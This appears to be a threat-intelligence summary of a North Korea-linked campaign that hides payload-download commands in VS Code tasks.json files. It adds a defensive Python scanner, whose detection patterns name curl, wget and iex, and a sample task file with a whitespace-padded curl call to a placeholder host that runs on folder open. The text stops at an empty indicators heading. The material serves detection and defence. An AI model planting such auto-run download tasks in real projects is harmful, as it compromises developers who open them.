Contagious Interview Campaign Abusing VSCode Distributed on Github

2026-02-26 ENKI

https://www.enki.co.kr/en/media-center/blog/contagious-interview-campaign-abusing-vscode-distributed-on-github


ENKI attributes GitHub-hosted malware abusing Visual Studio Code automation features to the DPRK-nexus Contagious Interview campaign targeting developers. Actors posed as recruiters, Web3 developers, and fictitious companies, then embedded OS-specific download commands in .vscode/tasks.json so payloads could execute when victims opened repositories in VS Code. The chain staged BeaverTail, InvisibleFerret, or OtterCookie through C2-hosted scripts, with some malicious commands hidden by whitespace padding and code artifacts suggesting LLM-assisted development. The report lists attacker GitHub personas, suspicious repositories, typosquatted infrastructure such as koinos[.]us, and C2-derived artifacts that help defenders hunt repository-based developer compromise.
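A hunting check for the tasks.json abuse summarized above, added here as an example and not taken from the ENKI report: it flags tasks that combine run-on-folder-open with a download command or a long whitespace run. The regexes, the threshold of two signals and the sample file are assumptions; `runOptions.runOn: "folderOpen"` and the `windows`/`osx`/`linux` override keys come from VS Code's task schema.

```python
import json
import re

# Heuristics below are assumptions for this example, not rules from the report.
FETCH = re.compile(r"\b(curl|wget|iwr|Invoke-WebRequest|iex|Invoke-Expression)\b", re.I)
PADDING = re.compile(r"[ \t]{40,}")  # long blank run that pushes text out of view
OS_KEYS = ("windows", "osx", "linux")  # per-OS override blocks in a VS Code task


def command_lines(task):
    """Yield (scope, full command line) for a task and its per-OS overrides."""
    for scope in ("default",) + OS_KEYS:
        node = task if scope == "default" else task.get(scope)
        if isinstance(node, dict) and "command" in node:
            parts = [node["command"]] + list(node.get("args") or [])
            yield scope, " ".join(p if isinstance(p, str) else json.dumps(p) for p in parts)


def audit_tasks(text):
    """Return (label, scope, reasons) findings for one tasks.json body."""
    try:
        doc = json.loads(text)
    except json.JSONDecodeError:
        # tasks.json may hold comments (JSONC); do not skip it silently.
        return [("<file>", "-", ("unparseable-review-manually",))]
    tasks = doc.get("tasks", []) if isinstance(doc, dict) else []
    findings = []
    for task in tasks:
        auto = (task.get("runOptions") or {}).get("runOn") == "folderOpen"
        for scope, cmd in command_lines(task):
            signals = {"auto-run-on-open": auto, "network-fetch": bool(FETCH.search(cmd)),
                       "whitespace-padding": bool(PADDING.search(cmd))}
            reasons = tuple(name for name, hit in signals.items() if hit)
            if len(reasons) >= 2:  # one signal alone is common in benign repos
                findings.append((task.get("label", "?"), scope, reasons))
    return findings

# Constructed sample; the host is a placeholder, not an indicator from the page.
SAMPLE = json.dumps({"version": "2.0.0", "tasks": [
    {"label": "test", "type": "shell", "command": "npm test"},
    {"label": "env-check", "type": "shell", "command": "echo ok",
     "runOptions": {"runOn": "folderOpen"},
     "osx": {"command": "echo ok" + " " * 200 + "; curl -s https://placeholder.invalid/x"},
     "windows": {"command": "echo ok" + " " * 200 + "& curl https://placeholder.invalid/x"}},
]})

if __name__ == "__main__":
    for finding in audit_tasks(SAMPLE):
        print(finding)
```

Run it over every `.vscode/tasks.json` in a cloned repository before opening the folder in VS Code; a file that fails strict JSON parsing is reported for manual review rather than passed.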

Indicators of Compromise

